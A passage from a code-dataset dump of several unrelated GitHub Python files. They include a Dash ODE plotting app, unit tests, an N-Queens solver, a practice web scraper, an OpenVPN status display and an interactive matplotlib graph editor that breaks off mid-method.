Imports\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import solve_ivp\n\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport dash\nfrom dash import dcc, html\nfrom dash.dependencies import Input, Output\n\n\"\"\"## Model definitions\"\"\"\n\ndef gene_expression_eq1(t, x, params):\n '''\n t - time span\n x - differentiated variable\n params - set of specific parameters for this equation!\n returns: x(t)\n '''\n\n try:\n phi, s, delta, n, m, A, E, S, E_trh, S_trh = params\n except ValueError as ve:\n print(ve, 'Check that your parameters satisfy Model 1 parameters!')\n\n enhancer_term = np.power(E, n) / (np.power(E, n) + np.power(E_trh, n))\n silencer_term = np.power(S_trh, m) / (np.power(S, m) + np.power(E_trh, m))\n x_t = phi * s * A * enhancer_term * silencer_term - x*delta\n\n return x_t\n\n\ndef gene_expression_eq2(t, x, params):\n '''\n t - time span\n x - differentiated variable\n params - set of specific parameters for this equation!\n returns: x(t)\n '''\n\n try:\n phi, s, delta, A, E, S, Ek1, Ek2, Sk1, Sk2 = params\n except ValueError as ve:\n print(ve, 'Check that your parameters satisfy Model 1 parameters!')\n\n\n x_t = phi * s * A * ((E/Ek1 + 1)*(A + Ek2))/((A + Sk2)*(1+S/Sk1)) - x*delta\n\n return x_t\n\ndef solve_eq(eq, x0, params, t_span = (0, 10), nsteps=10):\n '''\n eq - function for DE\n x0 - initial values (np.array)\n params - set of specific parameters for this equation (list)\n returns: y = dx/dt\n '''\n # solving the equation numerically\n solution = solve_ivp(\n eq,\n t_span = t_span,\n y0 = x0,\n args = [params],\n t_eval = np.linspace(t_span[0], t_span[1], nsteps)\n )\n return solution\n\n\"\"\"## Dash app - plotting two equations\"\"\"\n\napp = dash.Dash(__name__)\n\napp.layout = html.Div(children=[\n html.Div([\n dcc.Graph(id='ode-graph'),\n ]) ,\n\n # base parameters\n html.Div([\n html.H4('Common parameters:'),\n html.H6('Phi'),\n dcc.Slider(id='slider-phi', min=0.0, max=5.0, step=1.0, value=1.0),\n html.H6('s'),\n dcc.Slider(id='slider-s', min=0.0, max=5.0, step=1.0, value=1.0),\n html.H6('delta'),\n dcc.Slider(id='slider-delta', min=0.0, max=5.0, step=1.0, value=1.0),\n html.H6('A'),\n dcc.Slider(id='slider-A', min=0.0, max=2.0, step=0.5, value=1.0),\n html.H6('E'),\n dcc.Slider(id='slider-E', min=0.0, max=2.0, step=0.5, value=1.0),\n html.H6('S'),\n dcc.Slider(id='slider-S', min=0.0, max=2.0, step=0.5, value=1.0),\n\n html.H4('Parameters for equation 2:'),\n html.H6('Ke1'),\n dcc.Slider(id='slider-Ke1', min=0.1, max=3.6, step=0.5, value=1.0),\n html.H6('Ke2'),\n dcc.Slider(id='slider-Ke2', min=0.1, max=3.6, step=0.5, value=1.0),\n html.H6('Ks1'),\n dcc.Slider(id='slider-Ks1', min=0.1, max=3.6, step=0.5, value=1.0),\n html.H6('Ks2'),\n dcc.Slider(id='slider-Ks2', min=0.1, max=3.6, step=0.5, value=1.0),\n\n html.H4('Parameters for equation 1:'),\n html.H6('n'),\n dcc.Slider(id='slider-n', min=0, max=8, step=2, value=2),\n html.H6('m'),\n dcc.Slider(id='slider-m', min=0, max=8, step=2, value=2),\n html.H6('E_trh'),\n dcc.Slider(id='slider-E_trh', min=0.1, max=3.6, step=0.5, value=1.0),\n html.H6('S_trh'),\n dcc.Slider(id='slider-S_trh', min=0.1, max=3.6, step=0.5, value=1.0),\n ])\n])\n\n\n@app.callback(\n Output('ode-graph', 'figure'),\n [\n Input('slider-phi', 'value'),\n Input('slider-s', 'value'),\n Input('slider-delta', 'value'),\n Input('slider-A', 'value'),\n Input('slider-E', 'value'),\n Input('slider-S', 'value'),\n\n Input('slider-Ke1', 'value'),\n Input('slider-Ke2', 'value'),\n Input('slider-Ks1', 'value'),\n Input('slider-Ks2', 'value'),\n\n Input('slider-n', 'value'),\n Input('slider-m', 'value'),\n Input('slider-E_trh', 'value'),\n Input('slider-S_trh', 'value')\n ]\n)\ndef update_graph(phi, s, delta, A, E, S,\n Ek1, Ek2, Sk1, Sk2,\n n, m, E_trh, S_trh):\n x0 = np.array([10])\n\n params1 = [phi, s, delta, n, m, A, E, S, E_trh, S_trh]\n params2 = [phi, s, delta, A, E, S, Ek1, Ek2, Sk1, Sk2]\n\n sol1 = solve_eq(gene_expression_eq1, x0, params1)\n sol2 = solve_eq(gene_expression_eq2, x0, params2)\n\n sol_df = pd.DataFrame({'solution, dx/td': sol1.y.tolist()[0] + sol2.y.tolist()[0],\n 'time, units': sol1.t.tolist() + sol2.t.tolist(),\n 'equation': [1]*len(sol1.t) + [2]*len(sol2.t)})\n\n #fig = go.Figure()\n #fig.add_trace(go.Scatter(x=selected_df['sol'], y=selected_df['time'], mode='lines', ))\n #fig.update_layout(title='ODE Solution', xaxis_title='Time', yaxis_title='Solution')\n fig = px.line(\n sol_df, x=\"time, units\", y=\"solution, dx/td\", color='equation')\n\n return fig\n\nif __name__ == '__main__':\n app.run(debug=True) # by default host='127.0.0.1', port='8050'\n","repo_name":"checheanya/expression_modelling","sub_path":"part1/lineplots_2equations.py","file_name":"lineplots_2equations.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9987150933","text":"# -*- coding: utf-8 -*-\n#! \\file ./tests/test_support/test_cmd/test_errors.py\n#! \\author Jiří Kučera, \n#! \\stamp 2016-04-06 20:37:59 (UTC+01:00, DST+01:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nCommand processor's error module tests.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nimport unittest\n\nfrom doit.support.errors import DoItError\n\nfrom doit.support.cmd.errors import \\\n ERROR_COMMAND_PROCESSOR, \\\n ERROR_COMMAND, \\\n CommandProcessorError, \\\n CommandError\n\nclass AuxExceptionClass(object):\n __slots__ = [ 'name' ]\n\n def __init__(self, name):\n self.name = name\n #-def\n\n def __str__(self):\n return self.name\n #-def\n#-class\n\nclass AuxTraceback(list):\n __slots__ = []\n\n def __init__(self, content):\n list.__init__(self, content)\n #-def\n\n def __str__(self):\n return \".\".join(self)\n #-def\n#-class\n\nclass TestCommandProcessorErrorCase(unittest.TestCase):\n\n def test_CommandProcessorError(self):\n error_code = ERROR_COMMAND_PROCESSOR\n error_message = \"Dummy error message\"\n traceback = AuxTraceback([\"f1\", \"f2\", \"g3\"])\n none_traceback = None\n\n with self.assertRaises(CommandProcessorError) as eh:\n raise CommandProcessorError(traceback, error_message)\n\n self.assertEqual(\n str(eh.exception),\n \"f1.f2.g3 %s\" % (\n DoItError.ERRMSGFMT % (\n CommandProcessorError.__name__,\n error_code,\n error_message\n )\n )\n )\n\n with self.assertRaises(CommandProcessorError) as eh:\n raise CommandProcessorError(none_traceback, error_message)\n\n self.assertEqual(\n str(eh.exception),\n DoItError.ERRMSGFMT % (\n CommandProcessorError.__name__,\n error_code,\n error_message\n )\n )\n #-def\n#-class\n\nclass TestCommandErrorCase(unittest.TestCase):\n\n def test_CommandError(self):\n eclsname = \"SomeError\"\n detail = \"Some error detail\"\n tb = ()\n\n with self.assertRaises(CommandError) as eh:\n raise CommandError(AuxExceptionClass(eclsname), detail, tb)\n\n self.assertEqual(\n str(eh.exception),\n DoItError.ERRMSGFMT % (\n CommandError.__name__, ERROR_COMMAND,\n \"%s: %s\" % (eclsname, detail)\n )\n )\n self.assertEqual(\n repr(eh.exception), \"%s(\\\"%s\\\")\" % (eclsname, detail)\n )\n self.assertIs(eh.exception.tb, tb)\n #-def\n#-class\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestCommandProcessorErrorCase))\n suite.addTest(unittest.makeSuite(TestCommandErrorCase))\n return suite\n#-def\n","repo_name":"i386x/doit","sub_path":"tests/test_support/test_cmd/test_errors.py","file_name":"test_errors.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1365195151","text":"\"\"\"\nScript to remove duplicates in the database\n\"\"\"\nimport sys\n\nsys.path.insert(1, './api')\nfrom hype_meter import get_collection # noqa # pylint:disable=import-error, wrong-import-position\n\ncollection = get_collection()\n\nfor document in collection.find():\n collection_name = document['name']\n query = {'name': collection_name}\n while len(list(collection.find(query))) != 1:\n print(\"Deleting \" + collection_name)\n collection.delete_one(query)\n","repo_name":"alexrichardson1/nft-toolkit","sub_path":"ml/update_scripts/remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"1678114738","text":"#!/usr/bin/python3\n\"\"\"N Queens problem\"\"\"\nimport sys\n\n\ndef isSafe(board, row, col, n):\n \"\"\"Check if a queen can be placed on board\"\"\"\n for i in range(col):\n if board[row][i] == 1:\n return False\n for i, j in zip(range(row, -1, -1), range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n for i, j in zip(range(row, n, 1), range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n return True\n\n\ndef solveNQUtil(board, col, n):\n \"\"\"Solve the n queen problem\"\"\"\n if col == n:\n solution = []\n for i in range(n):\n for j in range(n):\n if board[i][j] == 1:\n solution.append([i, j])\n print(solution)\n return True\n res = False\n for i in range(n):\n if isSafe(board, i, col, n):\n board[i][col] = 1\n res = solveNQUtil(board, col + 1, n) or res\n board[i][col] = 0\n return res\n\n\ndef solveNQ(n):\n \"\"\"Solve the N Queen problem\"\"\"\n board = [[0 for j in range(n)] for i in range(n)]\n if not solveNQUtil(board, 0, n):\n return False\n return True\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"Usage: nqueens N\")\n sys.exit(1)\n try:\n n = int(sys.argv[1])\n except ValueError:\n print(\"N must be a number\")\n sys.exit(1)\n if n < 4:\n print(\"N must be at least 4\")\n sys.exit(1)\n solveNQ(n)\n","repo_name":"Felixdiamond/alx-interview","sub_path":"0x05-nqueens/0-nqueens.py","file_name":"0-nqueens.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35216165911","text":"def jc(arg):\n tt = 1\n for i in range(1, arg+1):\n tt *= i\n return tt\n\ndef Sum(arg):\n sum = 0\n for i in range(1, arg+1):\n sum += jc(i)\n return sum\n\n\na = input('请输入数字:')\ntry:\n b = eval(a)\nexcept NameError:\n print('输入有误,请输入正整数')\nelse:\n if type(b) == int:\n obj = Sum(b)\n print(obj)\n else:\n print('输入有误,请输入正整数')","repo_name":"xcyi2017/exercise","sub_path":"abcd.py","file_name":"abcd.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27709836648","text":"#! /usr/bin/python\n\nimport time, sys\nimport scrollphat\nfrom datetime import datetime\n\nwhile True:\n\n vpnlog = open('/var/log/openvpn-status.log')\n\n x = 0\n msg = \"\"\n\n for line in vpnlog:\n x += 1\n if x < 4:\n continue\n\n if \"ROUTING TABLE\" in line:\n break\n else:\n userlist = (line.split(\",\"))\n name = userlist[0]\n connect_time = userlist[4].replace(\"\\n\", \"\")\n connect_time = datetime.strptime(connect_time, '%c')\n time_now = datetime.now()\n connected = time_now - connect_time\n connected = str(connected).split('.', 2)[0]\n msg += (name.upper() + \" SESSION TIME: \" + connected + \" \")\n\n vpnlog.close()\n\n scrollphat.set_brightness(25)\n scrollphat.write_string(msg, 11)\n length = scrollphat.buffer_len()\n\n for i in range(length): # for one off's\n try:\n scrollphat.scroll(1)\n time.sleep(0.06)\n msg = \" \"\n except KeyboardInterrupt:\n scrollphat.clear()\n sys.exit(-1)\n\n # clear the phat buffer and sleep for 30 seconds\n scrollphat.clear()\n time.sleep(30)\n \n","repo_name":"t3amj3ff/activevpn","sub_path":"activevpn.py","file_name":"activevpn.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2901031821","text":"import requests\nimport parsel\n\n\nbase = 'http://books.toscrape.com/catalogue'\nresponse = requests.get(base + '/the-grand-design_405/index.html')\n# response = requests.get(site)\n# print(response.text)\nselector = parsel.Selector(response.text)\n\ntitle = selector.css('h1::text').get() # pegando o titulo\n\n# print(title)\n\nprice = selector.css(\".product_main > .price_color::text\").re_first(r\"\\d*\\.\\d{2}\") # pegando o preço\n\ndescription = selector.css(\"#product_description ~ p::text\").get() # descrição\nsuffix = \"...more\"\nif description.endswith(suffix):\n description = description[:-len(suffix)]\n\ncover = base + selector.css(\"#product_gallery img::attr(src)\").get()\n\nprint(title, price, description, cover, sep=\",\")\n","repo_name":"cecilia-martins/trybe-exercicios","sub_path":"ciencia-da-computacao/redes-e-raspagem-de-dados/ex004.py","file_name":"ex004.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24783783705","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInteractiveGraph variants.\n\"\"\"\n\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom functools import partial\nfrom matplotlib.patches import Rectangle\nfrom matplotlib.backend_bases import key_press_handler\n\ntry:\n from ._main import InteractiveGraph, BASE_SCALE, DraggableGraph\n from ._line_supercover import line_supercover\n from ._artists import NodeArtist, EdgeArtist\n from ._parser import is_order_zero, is_empty, parse_graph\nexcept ValueError:\n from _main import InteractiveGraph, BASE_SCALE\n from _line_supercover import line_supercover\n from _parser import is_order_zero, is_empty, parse_graph\n\n\nclass NascentEdge(plt.Line2D):\n def __init__(self, source, origin):\n self.source = source\n self.origin = origin\n x0, y0 = origin\n super().__init__([x0, x0], [y0, y0], color='lightgray', linestyle='--')\n\n def _update(self, x1, y1):\n x0, y0 = self.origin\n super().set_data([[x0, x1], [y0, y1]])\n\n\nclass MutableGraph(InteractiveGraph):\n \"\"\"Extends `InteractiveGraph` to support the addition or removal of nodes and edges.\n\n - Double clicking on two nodes successively will create an edge between them.\n - Pressing 'insert' or '+' will add a new node to the graph.\n - Pressing 'delete' or '-' will remove selected nodes and edges.\n - Pressing '@' will reverse the direction of selected edges.\n\n Notes\n -----\n When adding a new node, the properties of the last selected node will be used to style the node artist.\n Ditto for edges. If no node or edge has been previously selected the first created node or edge artist will be used.\n\n See also\n --------\n InteractiveGraph\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n if is_order_zero(args[0]):\n # The graph is order-zero, i.e. it has no edges and no nodes.\n # We hence initialise with a single edge, which populates\n # - last_selected_node_properties\n # - last_selected_edge_properties\n # with the chosen parameters.\n # We then delete the edge and the two nodes and return the empty canvas.\n super().__init__([(0, 1)], *args[1:], **kwargs)\n self._initialize_data_structures()\n self._delete_edge((0, 1))\n self._delete_node(0)\n self._delete_node(1)\n\n elif is_empty(args[0]):\n # The graph is empty, i.e. it has at least one node but no edges.\n nodes, _, _ = parse_graph(args[0])\n if len(nodes) > 1:\n edge = (nodes[0], nodes[1])\n super().__init__([edge], nodes=nodes, *args[1:], **kwargs)\n self._initialize_data_structures()\n self._delete_edge(edge)\n else: # single node\n node = nodes[0]\n dummy = 0 if node != 0 else 1\n edge = (node, dummy)\n super().__init__([edge], *args[1:], **kwargs)\n self._initialize_data_structures()\n self._delete_edge(edge)\n self._delete_node(dummy)\n else:\n super().__init__(*args, **kwargs)\n self._initialize_data_structures()\n\n # Ignore data limits and return full canvas.\n xmin, ymin = self.origin\n dx, dy = self.scale\n self.ax.axis([xmin, xmin+dx, ymin, ymin+dy])\n\n self.fig.canvas.mpl_connect('key_press_event', self._on_key_press)\n\n\n def _initialize_data_structures(self):\n self._reverse_node_artists = {artist : node for node, artist in self.node_artists.items()}\n self._reverse_edge_artists = {artist : edge for edge, artist in self.edge_artists.items()}\n self._last_selected_node_properties = self._extract_node_properties(next(iter(self.node_artists.values())))\n self._last_selected_edge_properties = self._extract_edge_properties(next(iter(self.edge_artists.values())))\n self._nascent_edge = None\n\n\n def _on_key_press(self, event):\n if event.key in ('insert', '+'):\n self._add_node(event)\n elif event.key in ('delete', '-'):\n self._delete_nodes()\n self._delete_edges()\n elif event.key == '@':\n self._reverse_edges()\n else:\n pass\n\n self.fig.canvas.draw_idle()\n\n\n def _on_press(self, event):\n # TODO : trigger this code on any node or edge selection;\n # clicking on a node or edge is just one of the ways to select them\n super()._on_press(event)\n\n if event.inaxes == self.ax:\n for artist in self._clickable_artists:\n if artist.contains(event)[0]:\n self._extract_artist_properties(artist)\n break\n\n if event.dblclick:\n self._add_or_remove_nascent_edge(event)\n\n\n def _add_or_remove_nascent_edge(self, event):\n for node, artist in self.node_artists.items():\n if artist.contains(event)[0]:\n if self._nascent_edge:\n # connect edge to target node\n if (self._nascent_edge.source, node) not in self.edges:\n self._add_edge((self._nascent_edge.source, node))\n self._update_edges([(self._nascent_edge.source, node)])\n else:\n print(\"Edge already exists!\")\n self._remove_nascent_edge()\n else:\n self._nascent_edge = self._add_nascent_edge(node)\n break\n else:\n if self._nascent_edge:\n self._remove_nascent_edge()\n\n\n def _add_nascent_edge(self, node):\n nascent_edge = NascentEdge(node, self.node_positions[node])\n self.ax.add_artist(nascent_edge)\n return nascent_edge\n\n\n def _remove_nascent_edge(self):\n self._nascent_edge.remove()\n self._nascent_edge = None\n\n\n def _extract_artist_properties(self, artist):\n if isinstance(artist, NodeArtist):\n self._last_selected_node_properties = self._extract_node_properties(artist)\n elif isinstance(artist, EdgeArtist):\n self._last_selected_edge_properties = self._extract_edge_properties(artist)\n\n\n def _extract_node_properties(self, node_artist):\n return dict(\n shape = node_artist.shape,\n radius = node_artist.radius,\n facecolor = node_artist.get_facecolor(),\n edgecolor = self._base_edgecolor[node_artist],\n linewidth = self._base_linewidth[node_artist],\n alpha = self._base_alpha[node_artist],\n zorder = node_artist.get_zorder()\n )\n\n\n def _extract_edge_properties(self, edge_artist):\n return dict(\n width = edge_artist.width,\n facecolor = edge_artist.get_facecolor(),\n alpha = self._base_alpha[edge_artist],\n head_length = edge_artist.head_length,\n head_width = edge_artist.head_width,\n edgecolor = self._base_edgecolor[edge_artist],\n linewidth = self._base_linewidth[edge_artist],\n offset = edge_artist.offset, # TODO: need to get node_size of target node instead\n curved = edge_artist.curved,\n zorder = edge_artist.get_zorder(),\n )\n\n\n def _on_motion(self, event):\n super()._on_motion(event)\n\n if event.inaxes == self.ax:\n if self._nascent_edge:\n self._nascent_edge._update(event.xdata, event.ydata)\n self.fig.canvas.draw_idle()\n\n\n def _add_node(self, event):\n if event.inaxes != self.ax:\n print('Position outside of axis limits! Cannot create node.')\n return\n\n # create node ID; use smallest unused int\n node = 0\n while node in self.node_positions.keys():\n node += 1\n\n # get position of cursor place node at cursor position\n pos = self._set_position_of_newly_created_node(event.xdata, event.ydata)\n\n # copy attributes of last selected artist;\n # if none is selected, use a random artist\n if self._selected_artists:\n node_properties = self._extract_node_properties(self._selected_artists[-1])\n else:\n node_properties = self._last_selected_node_properties\n\n artist = NodeArtist(xy = pos, **node_properties)\n\n self._reverse_node_artists[artist] = node\n\n # Update data structures in parent classes:\n # 1) InteractiveGraph\n # 2a) DraggableGraph\n self._draggable_artist_to_node[artist] = node\n # 2b) EmphasizeOnHoverGraph\n self.artist_to_key[artist] = node\n # 2c) AnnotateOnClickGraph\n # None\n # 3a) Graph\n # None\n # 3b) ClickableArtists, SelectableArtists, DraggableArtists\n self._clickable_artists.append(artist)\n self._selectable_artists.append(artist)\n self._draggable_artists.append(artist)\n self._base_linewidth[artist] = artist._lw_data\n self._base_edgecolor[artist] = artist.get_edgecolor()\n # 3c) EmphasizeOnHover\n self.emphasizeable_artists.append(artist)\n self._base_alpha[artist] = artist.get_alpha()\n # 3d) AnnotateOnClick\n # None\n # 4) BaseGraph\n self.nodes.append(node)\n self.node_positions[node] = pos\n self.node_artists[node] = artist\n self.ax.add_patch(artist)\n # self.node_label_artists # TODO (potentially)\n # self.node_label_offset # TODO (potentially)\n\n\n def _set_position_of_newly_created_node(self, x, y):\n return (x, y)\n\n\n def _delete_nodes(self):\n # translate selected artists into nodes\n nodes = [self._reverse_node_artists[artist] for artist in self._selected_artists if isinstance(artist, NodeArtist)]\n\n # delete edges to and from selected nodes\n edges = [(source, target) for (source, target) in self.edges if ((source in nodes) or (target in nodes))]\n for edge in edges:\n self._delete_edge(edge)\n\n # delete nodes\n for node in nodes:\n self._delete_node(node)\n\n\n def _delete_node(self, node):\n # print(f\"Deleting node {node}.\")\n artist = self.node_artists[node]\n\n del self._reverse_node_artists[artist]\n\n # Update data structures in parent classes:\n # 1) InteractiveGraph\n # None\n # 2a) DraggableGraph\n del self._draggable_artist_to_node[artist]\n # 2b) EmphasizeOnHoverGraph\n del self.artist_to_key[artist]\n # None\n # 2c) AnnotateOnClickGraph\n if artist in self.annotated_artists:\n self._remove_annotation(artist)\n # 3a) Graph\n # None\n # 3b) ClickableArtists, SelectableArtists, DraggableArtists\n self._clickable_artists.remove(artist)\n self._selectable_artists.remove(artist)\n self._draggable_artists.remove(artist)\n if artist in self._selected_artists:\n self._selected_artists.remove(artist)\n del self._base_linewidth[artist]\n del self._base_edgecolor[artist]\n # 3c) EmphasizeOnHover\n self.emphasizeable_artists.remove(artist)\n del self._base_alpha[artist]\n # 3d) AnnotateOnClick\n if artist in self.artist_to_annotation:\n del self.artist_to_annotation[artist]\n # 4) BaseGraph\n self.nodes.remove(node)\n del self.node_positions[node]\n del self.node_artists[node]\n if hasattr(self, 'node_label_artists'):\n if node in self.node_label_artists:\n self.node_label_artists[node].remove()\n del self.node_label_artists[node]\n if hasattr(self, 'node_label_offset'):\n if node in self.node_label_offset:\n del self.node_label_offset[node]\n artist.remove()\n\n\n def _add_edge(self, edge, edge_properties=None):\n # TODO: support non-straight edge paths when initializing the new edge.\n # Currently, we circumvent the problem by calling _update_edges after edge creation.\n source, target = edge\n path = np.array([self.node_positions[source], self.node_positions[target]])\n\n # create artist\n if not edge_properties:\n edge_properties = self._last_selected_edge_properties\n\n if (target, source) in self.edges:\n shape = 'right'\n self.edge_artists[(target, source)].shape = 'right'\n self.edge_artists[(target, source)]._update_path()\n else:\n shape = 'full'\n\n artist = EdgeArtist(midline=path, shape=shape, **edge_properties)\n\n self._reverse_edge_artists[artist] = edge\n\n # update data structures in parent classes\n # 1) InteractiveGraph\n # 2a) DraggableGraph\n # None\n # 2b) EmphasizeOnHoverGraph\n self.artist_to_key[artist] = edge\n # 2c) AnnotateOnClickGraph\n # None\n # 3a) Graph\n # None\n # 3b) ClickableArtists, SelectableArtists, DraggableArtists\n self._clickable_artists.append(artist)\n self._selectable_artists.append(artist)\n self._base_linewidth[artist] = artist._lw_data\n self._base_edgecolor[artist] = artist.get_edgecolor()\n # 3c) EmphasizeOnHover\n self.emphasizeable_artists.append(artist)\n self._base_alpha[artist] = artist.get_alpha()\n # 3d) AnnotateOnClick\n # None\n # 4) BaseGraph\n self.edges.append(edge)\n self.edge_paths[edge] = path\n self.edge_artists[edge] = artist\n self.ax.add_patch(artist)\n\n\n def _delete_edges(self):\n edges = [self._reverse_edge_artists[artist] for artist in self._selected_artists if isinstance(artist, EdgeArtist)]\n for edge in edges:\n self._delete_edge(edge)\n\n\n def _delete_edge(self, edge):\n artist = self.edge_artists[edge]\n del self._reverse_edge_artists[artist]\n\n source, target = edge\n if (target, source) in self.edges:\n self.edge_artists[(target, source)].shape = 'full'\n self.edge_artists[(target, source)]._update_path()\n\n # update data structures in parent classes\n # 1) InteractiveGraph\n # None\n # 2a) DraggableGraph\n # None\n # 2b) EmphasizeOnHoverGraph\n del self.artist_to_key[artist]\n # 2c) AnnotateOnClickGraph\n if artist in self.annotated_artists:\n self._remove_annotation(artist)\n # 3a) Graph\n # None\n # 3b) ClickableArtists, SelectableArtists, DraggableArtists\n self._clickable_artists.remove(artist)\n self._selectable_artists.remove(artist)\n try:\n self._selected_artists.remove(artist)\n except ValueError:\n pass\n del self._base_linewidth[artist]\n del self._base_edgecolor[artist]\n # 3c) EmphasizeOnHover\n self.emphasizeable_artists.remove(artist)\n try:\n self.deemphasized_artists.remove(artist)\n except ValueError:\n pass\n del self._base_alpha[artist]\n # 3d) AnnotateOnClick\n if artist in self.artist_to_annotation:\n del self.artist_to_annotation[artist]\n # 4) BaseGraph\n self.edges.remove(edge)\n del self.edge_paths[edge]\n del self.edge_artists[edge]\n if hasattr(self, 'edge_label_artists'):\n if edge in self.edge_label_artists:\n self.edge_label_artists[edge].remove()\n del self.edge_label_artists[edge]\n # TODO remove edge data\n artist.remove()\n\n\n def _reverse_edges(self):\n edges = [self._reverse_edge_artists[artist] for artist in self._selected_artists if isinstance(artist, EdgeArtist)]\n edge_properties = [self._extract_edge_properties(self.edge_artists[edge]) for edge in edges]\n\n # delete old edges;\n # note this step has to be completed before creating new edges,\n # as bi-directional edges can pose a problem otherwise\n for edge in edges:\n self._delete_edge(edge)\n\n for edge, properties in zip(edges, edge_properties):\n self._add_edge(edge[::-1], properties)\n\n\nclass EditableGraph(MutableGraph):\n \"\"\"Extends `InteractiveGraph` to support adding, deleting, and editing graph elements interactively.\n\n a) Addition and removal of nodes and edges:\n\n - Double clicking on two nodes successively will create an edge between them.\n - Pressing 'insert' or '+' will add a new node to the graph.\n - Pressing 'delete' or '-' will remove selected nodes and edges.\n - Pressing '@' will reverse the direction of selected edges.\n\n b) Creation and editing of labels and annotations:\n\n - To create or edit a node or edge label, select the node (or edge) artist, press the 'enter' key, and type.\n - To create or edit an annotation, select the node (or edge) artist, press 'alt'+'enter', and type.\n - Terminate either action by pressing 'enter' or 'alt'+'enter' a second time.\n\n Notes\n -----\n When adding a new node, the properties of the last selected node will be used to style the node artist.\n Ditto for edges. If no node or edge has been previously selected the first created node or edge artist will be used.\n\n See also\n --------\n InteractiveGraph\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # initiate node and edge label data structures if they don't exist\n if not hasattr(self, 'node_label_artists'):\n node_labels = {node : '' for node in self.nodes}\n self.node_label_fontdict = self._initialize_node_label_fontdict(\n kwargs.get('node_label_fontdict'), node_labels, kwargs.get('node_label_offset', (0., 0.)))\n self.node_label_offset, self._recompute_node_label_offsets =\\\n self._initialize_node_label_offset(node_labels, kwargs.get('node_label_offset', (0., 0.)))\n if self._recompute_node_label_offsets:\n self._update_node_label_offsets()\n self.node_label_artists = dict()\n self.draw_node_labels(node_labels, self.node_label_fontdict)\n\n if not hasattr(self, 'edge_label_artists'):\n edge_labels = {edge : '' for edge in self.edges}\n self.edge_label_fontdict = self._initialize_edge_label_fontdict(kwargs.get('edge_label_fontdict'))\n self.edge_label_position = kwargs.get('edge_label_position', 0.5)\n self.edge_label_rotate = kwargs.get('edge_label_rotate', True)\n self.edge_label_artists = dict()\n self.draw_edge_labels(edge_labels, self.edge_label_position,\n self.edge_label_rotate, self.edge_label_fontdict)\n\n self._currently_writing_labels = False\n self._currently_writing_annotations = False\n\n\n def _on_key_press(self, event):\n if event.key == 'enter':\n if self._currently_writing_labels or self._currently_writing_annotations:\n self._terminate_writing()\n else:\n self._initiate_writing_labels()\n elif event.key == 'alt+enter':\n if self._currently_writing_annotations or self._currently_writing_labels:\n self._terminate_writing()\n else:\n self._initiate_writing_annotations()\n else:\n if self._currently_writing_labels:\n self._edit_labels(event.key)\n elif self._currently_writing_annotations:\n self._edit_annotations(event.key)\n else:\n super()._on_key_press(event)\n\n\n def _terminate_writing(self):\n self._currently_writing_labels = False\n self._currently_writing_annotations = False\n self.fig.canvas.manager.key_press_handler_id \\\n = self.fig.canvas.mpl_connect('key_press_event', self.fig.canvas.manager.key_press)\n print('Finished writing.')\n\n\n def _initiate_writing_labels(self):\n self._currently_writing_labels = True\n self.fig.canvas.mpl_disconnect(self.fig.canvas.manager.key_press_handler_id)\n print('Initiated writing label(s).')\n\n\n def _initiate_writing_annotations(self):\n self._currently_writing_annotations = True\n self.fig.canvas.mpl_disconnect(self.fig.canvas.manager.key_press_handler_id)\n print('Initiated writing annotations(s).')\n\n\n def _edit_labels(self, key):\n for artist in self._selected_artists:\n if isinstance(artist, NodeArtist):\n self._edit_node_label(artist, key)\n elif isinstance(artist, EdgeArtist):\n self._edit_edge_label(artist, key)\n\n\n def _edit_node_label(self, artist, key):\n node = self.artist_to_key[artist]\n if node not in self.node_label_artists:\n # re-use a random 